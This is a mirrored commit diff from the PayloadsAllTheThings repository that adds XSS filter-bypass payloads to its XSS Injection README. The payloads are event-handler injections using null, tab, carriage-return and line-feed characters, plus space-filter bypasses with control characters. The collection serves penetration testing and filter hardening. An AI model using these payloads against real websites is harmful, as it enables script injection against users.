ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Add a few XSS filter bypass cases

Browse Source
This commit is contained in:
isacaya 2024-06-19 04:21:24 +09:00
parent 314e4da963
commit ca3ab6eb95
1 changed files with 4 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
XSS Injection/README.md
View File

@ -736,9 +736,11 @@ setTimeout`alert\u0028document.domain\u0029`;
<object onafterscriptexecute=confirm(0)> <object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)> <object onbeforescriptexecute=confirm(0)>
// Bypass onxxx= filter with a null byte/vertical tab // Bypass onxxx= filter with a null byte/vertical tab/Carriage Return/Line Feed
<img src='1' onerror\x00=alert(0) /> <img src='1' onerror\x00=alert(0) />
<img src='1' onerror\x0b=alert(0) /> <img src='1' onerror\x0b=alert(0) />
<img src='1' onerror\x0d=alert(0) />
<img src='1' onerror\x0a=alert(0) />
// Bypass onxxx= filter with a '/' // Bypass onxxx= filter with a '/'
<img src='1' onerror/=alert(0) /> <img src='1' onerror/=alert(0) />
@ -750,7 +752,7 @@ setTimeout`alert\u0028document.domain\u0029`;
// Bypass space filter with "/" // Bypass space filter with "/"
<img/src='1'/onerror=alert(0)> <img/src='1'/onerror=alert(0)>
// Bypass space filter with 0x0c/^L // Bypass space filter with 0x0c/^L or 0x0d/^M or 0x0a/^J or 0x09/^I
<svg onload = alert(1) > <svg onload = alert(1) >
$ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd